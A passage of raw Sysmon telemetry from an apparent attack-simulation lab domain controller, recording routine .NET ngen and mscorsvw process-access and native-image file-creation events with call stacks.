9\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:14.351{59A5CD1D-9252-6005-6A04-00000000A301}3792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ed0-0\System.ServiceModel.Routing.dll2021-01-18 13:51:14.351 10341000x80000000000000008684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.038{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9252-6005-6A04-00000000A301}3792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.023{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9252-6005-6A04-00000000A301}3792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.023{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9252-6005-6A04-00000000A301}3792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:15.929{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9253-6005-7004-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:15.913{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9253-6005-7004-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:15.913{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9253-6005-7004-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:15.788{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9253-6005-6F04-00000000A301}1752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:15.772{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9253-6005-6F04-00000000A301}1752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:15.772{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9253-6005-6F04-00000000A301}1752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:15.694{59A5CD1D-9252-6005-6E04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11e4-0\System.ServiceModel.Web.dll2021-01-18 13:51:15.679 10341000x80000000000000008709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:16.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9254-6005-7104-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:16.819{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9254-6005-7104-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:16.819{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9254-6005-7104-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:16.726{59A5CD1D-9253-6005-7004-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f4c-0\System.Speech.dll2021-01-18 13:51:16.726 10341000x80000000000000008715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:17.366{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:17.366{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:17.366{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:17.085{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9255-6005-7204-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:17.069{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9255-6005-7204-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:17.069{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9255-6005-7204-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000008716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:22.928{59A5CD1D-9255-6005-7204-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1324-0\System.Web.dll2021-01-18 13:51:22.928 10341000x80000000000000008736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.897{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925B-6005-7804-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.897{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-925B-6005-7804-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.897{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925B-6005-7804-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.678{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925B-6005-7704-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dl